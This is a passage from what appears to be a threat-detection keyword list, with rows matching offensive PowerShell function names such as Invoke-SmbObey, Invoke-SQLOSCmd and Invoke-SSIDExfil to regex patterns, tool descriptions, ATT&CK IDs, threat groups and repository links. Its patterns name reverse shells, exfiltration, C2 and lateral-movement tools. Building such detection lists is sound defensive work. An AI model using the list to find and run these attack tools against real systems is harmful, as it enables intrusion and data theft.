Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SmbObey *",".{0,1000}Invoke\-SmbObey\s.{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","0","N/A","10","10","13","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z" "*Invoke-SmbObey.*",".{0,1000}Invoke\-SmbObey\..{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","13","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z" "*Invoke-SmbOrder *",".{0,1000}Invoke\-SmbOrder\s.{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a 
communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","0","N/A","10","10","13","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z" "*Invoke-SmbOrder.*",".{0,1000}Invoke\-SmbOrder\..{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","13","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z" "*Invoke-SMBRemoting*",".{0,1000}Invoke\-SMBRemoting.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Invoke-SMBRemoting.ps1*",".{0,1000}Invoke\-SMBRemoting\.ps1.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","9","1","29","9","2024-05-01T13:42:06Z","2023-09-06T16:00:47Z" "*Invoke-SMBRemoting-main*",".{0,1000}Invoke\-SMBRemoting\-main.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","9","1","29","9","2024-05-01T13:42:06Z","2023-09-06T16:00:47Z" "*Invoke-SMBScanner*",".{0,1000}Invoke\-SMBScanner.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SmbScanner.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-SmbScanner*",".{0,1000}Invoke\-SmbScanner.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SmbScanner.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-SmbScanner*",".{0,1000}Invoke\-SmbScanner.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1080","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Snaffler*",".{0,1000}Invoke\-Snaffler.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Snaffler*",".{0,1000}Invoke\-Snaffler.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*invoke-sniffer *",".{0,1000}invoke\-sniffer\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-SocksProxy *",".{0,1000}Invoke\-SocksProxy\s.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","0","N/A","10","10","767","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" "*Invoke-SocksProxy*",".{0,1000}Invoke\-SocksProxy.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","Creates a local or reverse Socks proxy using powershell","T1090 - T1573 - T1059 - T1021","TA0002 - TA0011 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/p3nt4/Invoke-SocksProxy","1","0","N/A","N/A","10","767","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" "*Invoke-SocksProxy.*",".{0,1000}Invoke\-SocksProxy\..{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","10","10","767","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" 
"*Invoke-SocksProxy.ps1*",".{0,1000}Invoke\-SocksProxy\.ps1.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*Invoke-Spoolsample*",".{0,1000}Invoke\-Spoolsample.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SpoolSample*",".{0,1000}Invoke\-SpoolSample.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SprayEmptyPassword*",".{0,1000}Invoke\-SprayEmptyPassword.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SQLAudit*",".{0,1000}Invoke\-SQLAudit.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Scan for MSSQL misconfigurations to escalate to System Admin","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://stealthbits.com/blog/compromise-powerupsql-sql-attacks/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
"*Invoke-SQLAudit*",".{0,1000}Invoke\-SQLAudit.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SQLDumpInfo*",".{0,1000}Invoke\-SQLDumpInfo.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SQLOSCmd -Instance * -Command *",".{0,1000}Invoke\-SQLOSCmd\s\-Instance\s.{0,1000}\s\-Command\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Run command (enables XP_CMDSHELL automatically if required)","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Invoke-SQLOSCmd.ps1*",".{0,1000}Invoke\-SQLOSCmd\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SQLOSCmd.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-SQLOSCmd.ps1*",".{0,1000}Invoke\-SQLOSCmd\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1096","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-SQLUncPathInjection*",".{0,1000}Invoke\-SQLUncPathInjection.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SSHCommand.ps1*",".{0,1000}Invoke\-SSHCommand\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1094","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-SSIDExfil*",".{0,1000}Invoke\-SSIDExfil.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-SSIDExfil*",".{0,1000}Invoke\-SSIDExfil.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-StandIn.*",".{0,1000}Invoke\-StandIn\..{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*invokestealthuserhunter*",".{0,1000}invokestealthuserhunter.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-StealthUserHunter*",".{0,1000}Invoke\-StealthUserHunter.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-StealthUserHunter*",".{0,1000}Invoke\-StealthUserHunter.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Invoke-StickyNotesExtract*",".{0,1000}Invoke\-StickyNotesExtract.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Stompy*",".{0,1000}Invoke\-Stompy.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*Invoke-SystemStartupCheck*",".{0,1000}Invoke\-SystemStartupCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-SystemStartupHistoryCheck*",".{0,1000}Invoke\-SystemStartupHistoryCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - 
T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-SystemStartupHistoryCheck*",".{0,1000}Invoke\-SystemStartupHistoryCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-Tater.*",".{0,1000}Invoke\-Tater\..{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Tater.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Tater.ps1*",".{0,1000}Invoke\-Tater\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
